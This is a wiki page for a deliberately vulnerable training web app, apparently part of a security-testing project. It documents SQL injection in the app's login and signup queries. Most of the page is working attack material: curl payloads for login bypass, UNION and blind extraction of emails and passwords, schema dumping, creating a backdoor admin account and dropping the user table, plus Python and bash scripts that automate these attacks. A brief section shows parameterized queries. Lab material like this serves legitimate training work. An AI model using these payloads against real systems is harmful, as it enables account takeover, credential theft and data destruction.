SQL Injection

SQL Injection Exploitation

Overview

The Weak Website contains multiple SQL injection vulnerabilities in its authentication and user management systems. These vulnerabilities exist due to the use of raw SQL queries with string concatenation instead of parameterized queries.

Vulnerable Code Locations

Authentication Service

File: server/src/modules/auth/auth.service.ts

// Line 24-26: Login SQL Injection
const user = await this.userRepository.query(
  `SELECT * FROM user WHERE email = '${email}' AND password = '${password}'`
);

// Line 69-71: Registration SQL Injection  
await this.userRepository.query(
  `INSERT INTO user (email, password, role) VALUES ('${email}', '${normalizedPassword}', 'user')`
);

Exploitation Techniques

1. Authentication Bypass

Basic SQL Injection

Target: /auth/login endpoint

Vulnerability: The login query concatenates user input directly into the SQL statement.

Payload Examples:

# Email field bypass
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\''--","password":"anything"}'

# Alternative bypasses
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' OR '\''1'\''='\''1'\''--","password":"ignore"}'

How it works:

-- Original query
SELECT * FROM user WHERE email = 'admin' AND password = 'anything'

-- Injected query (with admin'-- payload)
SELECT * FROM user WHERE email = 'admin'--' AND password = 'anything'
-- The -- comments out the password check

Advanced Boolean-based Injection

# Test if admin user exists
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT COUNT(*) FROM user WHERE email='\''admin'\'')>0--","password":"test"}'

# Extract password length
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT LENGTH(password) FROM user WHERE email='\''admin'\'')>10--","password":"test"}'

2. Union-based Data Extraction

Extract All Users

# Union injection to extract user data
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT id,email,password,role FROM user--","password":"ignore"}'

Resulting Query:

SELECT * FROM user WHERE email = '' UNION SELECT id,email,password,role FROM user--' AND password = 'ignore'

Extract Database Schema

# Get table names
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT table_name,null,null,null FROM information_schema.tables WHERE table_schema=database()--","password":"test"}'

# Get column names
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT column_name,null,null,null FROM information_schema.columns WHERE table_name='\''user'\''--","password":"test"}'

3. Blind SQL Injection

Time-based Detection

# Test for time-based injection
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT SLEEP(5))--","password":"test"}'

Character-by-character Extraction

# Extract first character of admin password
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT SUBSTRING(password,1,1) FROM user WHERE email='\''admin'\'')='\''p'\''--","password":"test"}'

# Binary search approach for efficiency
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM user WHERE email='\''admin'\'')>64--","password":"test"}'

4. Registration SQL Injection

Privilege Escalation

# Create admin user via registration
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@evil.com'\'',(SELECT '\''password123'\'','\''admin'\''))--","password":"ignored"}'

Resulting Query:

INSERT INTO user (email, password, role) VALUES ('attacker@evil.com',(SELECT 'password123','admin'))--', 'normalizedPassword', 'user')

Database Manipulation

# Drop table (destructive - use with caution)
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"test@test.com'\'',(SELECT '\''password'\'','\''user'\'')); DROP TABLE user;--","password":"anything"}'

Automated Exploitation Scripts

Python SQLMap Integration

#!/usr/bin/env python3
import requests
import json

def test_sql_injection(url, payload):
    """Test SQL injection payload"""
    data = {
        "email": payload,
        "password": "test"
    }
    
    response = requests.post(
        f"{url}/auth/login",
        json=data,
        headers={"Content-Type": "application/json"}
    )
    
    return response.json()

# Test payloads
payloads = [
    "admin'--",
    "admin' OR '1'='1'--",
    "' UNION SELECT id,email,password,role FROM user--",
    "admin' AND (SELECT COUNT(*) FROM user)>0--"
]

url = "http://localhost:8080"
for payload in payloads:
    result = test_sql_injection(url, payload)
    print(f"Payload: {payload}")
    print(f"Result: {result}")
    print("-" * 50)

Bash Exploitation Script

#!/bin/bash

BASE_URL="http://localhost:8080"
ENDPOINT="/auth/login"

echo "=== SQL Injection Test Suite ==="

# Test 1: Basic authentication bypass
echo "Test 1: Authentication Bypass"
curl -s -X POST "$BASE_URL$ENDPOINT" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\''--","password":"anything"}' | jq '.'

# Test 2: Union-based data extraction
echo -e "\nTest 2: Data Extraction"
curl -s -X POST "$BASE_URL$ENDPOINT" \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT id,email,password,role FROM user--","password":"test"}' | jq '.'

# Test 3: Boolean-based blind injection
echo -e "\nTest 3: Blind Injection"
curl -s -X POST "$BASE_URL$ENDPOINT" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin'\'' AND (SELECT COUNT(*) FROM user WHERE email='\''admin'\'')>0--","password":"test"}' | jq '.'

echo -e "\n=== Test Complete ==="

Advanced Exploitation Scenarios

1. Multi-step Attack Chain

Step 1: Reconnaissance

# Enumerate users
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT GROUP_CONCAT(email),null,null,null FROM user--","password":"test"}'

Step 2: Password Extraction

# Extract all passwords
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT GROUP_CONCAT(CONCAT(email,'\'':\''',password)),null,null,null FROM user--","password":"test"}'

Step 3: Privilege Escalation

# Create backdoor admin account
curl -X POST http://localhost:8080/auth/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"backdoor@attacker.com'\'',(SELECT '\''password123'\'','\''admin'\''))--","password":"ignored"}'

2. Database Schema Mapping

Extract Table Structure

# Get all tables
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT GROUP_CONCAT(table_name),null,null,null FROM information_schema.tables WHERE table_schema=database()--","password":"test"}'

# Get columns for each table
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT GROUP_CONCAT(CONCAT(table_name,'\''.'\'',column_name)),null,null,null FROM information_schema.columns WHERE table_schema=database()--","password":"test"}'

3. Post-Exploitation Activities

Data Exfiltration

# Extract all posts
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT GROUP_CONCAT(content),null,null,null FROM post--","password":"test"}'

# Extract sensitive system information
curl -X POST http://localhost:8080/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\'' UNION SELECT @@version,@@datadir,USER(),database()--","password":"test"}'

Defensive Measures (For Reference)

Proper Implementation Examples

Parameterized Queries

// Secure version (not implemented in vulnerable app)
async login(email: string, password: string) {
  const user = await this.userRepository.findOne({
    where: { email, password }  // TypeORM handles parameterization
  });
  
  // Or with raw queries
  const user = await this.userRepository.query(
    'SELECT * FROM user WHERE email = ? AND password = ?',
    [email, password]
  );
}

Input Validation

// Proper validation
@IsEmail()
@Length(1, 255)
email: string;

@IsString()
@Length(8, 128)
@Matches(/^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])[A-Za-z\d@$!%*?&]/)
password: string;

Testing Methodology

1. Discovery Phase

Map all input fields and parameters
Identify database interaction points
Test for error-based information disclosure

2. Exploitation Phase

Start with basic injection tests
Escalate to union-based extraction
Attempt blind injection techniques
Test different SQL contexts

3. Post-Exploitation

Extract database schema
Dump sensitive data
Create persistent access
Document findings

Tools and Resources

Recommended Tools

SQLMap: Automated SQL injection testing
Burp Suite: Manual testing and payload generation
OWASP ZAP: Automated vulnerability scanning
Custom Scripts: Tailored to application specifics

Manual Testing Checklist

Common Mistakes and Tips

Exploitation Tips

URL Encoding: Some payloads may need URL encoding
Quote Escaping: Pay attention to single vs double quotes
Comment Syntax: Use -- for MySQL, # also works
Response Analysis: Look for subtle changes in responses
Error Messages: Leverage verbose error messages

SQL Injection

SQL Injection Exploitation

Overview

Vulnerable Code Locations

Authentication Service

Exploitation Techniques

1. Authentication Bypass

Basic SQL Injection

Advanced Boolean-based Injection

2. Union-based Data Extraction

Extract All Users

Extract Database Schema

3. Blind SQL Injection

Time-based Detection

Character-by-character Extraction

4. Registration SQL Injection

Privilege Escalation

Database Manipulation

Automated Exploitation Scripts

Python SQLMap Integration

Bash Exploitation Script

Advanced Exploitation Scenarios

1. Multi-step Attack Chain

Step 1: Reconnaissance

Step 2: Password Extraction

Step 3: Privilege Escalation

2. Database Schema Mapping

Extract Table Structure

3. Post-Exploitation Activities

Data Exfiltration

Defensive Measures (For Reference)

Proper Implementation Examples

Parameterized Queries

Input Validation

Testing Methodology

1. Discovery Phase

2. Exploitation Phase

3. Post-Exploitation

Tools and Resources

Recommended Tools

Manual Testing Checklist

Common Mistakes and Tips

Exploitation Tips

Troubleshooting

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Hermes Fullstack Wiki Navigation

Project Overview

Component Documentation

Weak Website (Vulnerable Web App)

WebScanner (Vulnerability Scanner)

GUI (Security Testing Interface)

Security & Vulnerabilities

Exploitation Guides

Clone this wiki locally